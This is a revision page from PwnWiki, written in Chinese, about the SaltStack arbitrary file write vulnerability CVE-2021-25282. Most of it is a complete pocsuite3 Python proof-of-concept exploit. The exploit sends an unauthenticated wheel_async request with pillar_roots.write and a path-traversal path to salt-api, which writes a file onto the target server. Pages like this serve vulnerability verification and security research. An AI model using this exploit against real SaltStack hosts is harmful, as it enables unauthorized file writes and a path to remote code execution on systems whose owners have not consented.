Difference between revisions of "Saltstack 任意文件寫入漏洞(CVE-2021-25282)"

From PwnWiki
(建立內容為「{| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | vali…」的新頁面)
 
 
Line 9: Line 9:
  
 
==POC==
 
==POC==
<code>
+
<pre>
 
#!/usr/bin/env python
 
#!/usr/bin/env python
 
# coding: utf-8
 
# coding: utf-8
Line 93: Line 93:
  
 
register_poc(TestPOC)
 
register_poc(TestPOC)
</code>
+
</pre>
 
 
 
 
  
 
==版權信息==
 
==版權信息==
 
POC由【之乎者也】提供。
 
POC由【之乎者也】提供。

Latest revision as of 21:45, 2 March 2021

Book.png 這個頁面的內容缺少參考,無法保證內容的準確性。


POC

#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE    
import re
import json


class TestPOC(POCBase):
    vulID = '000'
    version = '1'
    author = 'zhzyker'
    vulDate = '2021-02-27'
    createDate = '2021-03-02'
    updateDate = '2021-03-02'
    references = ['https://github.com/zhzyker/vulmap']
    name = 'SaltStack Arbitrary file writing vulnerability(CVE-2021-25282)'
    appName = 'SaltStack'
    appVersion = '< 3002.5'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
        Unauthorized access to wheel_async, arbitrary code/commands can be executed through salt-api.
    '''

    
    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8000]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            TIMEOUT = 10
            
            url = target + "/run"
            path = "../../../../../../../../../tmp/vuln"
            headers = {
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
                'Content-Type': 'application/json'
                }
            data = {
                'eauth': 'auto',
                'client': 'wheel_async',
                'fun': 'pillar_roots.write',
                'data': 'vuln_cve_2021_25282',
                'path': path
            }
            
            data = json.dumps(data)
            try:
                r = req.post(url, headers=headers, data=data, timeout=TIMEOUT, verify=False)
                # print(r.text)
                tag = list(json.loads(r.text)["return"])[0]["tag"]
                jid = list(json.loads(r.text)["return"])[0]["jid"]
                if r"salt/wheel" in tag:
                    if jid in tag:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = url
                        result['VerifyInfo']['JID'] = jid
                        result['VerifyInfo']['UPLOAD'] = path
                        break
            except:
                pass
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(TestPOC)

版權信息

POC由【之乎者也】提供。

Retrieved from "https://pwnwiki.com/index.php?title=Saltstack_任意文件寫入漏洞(CVE-2021-25282)&oldid=131"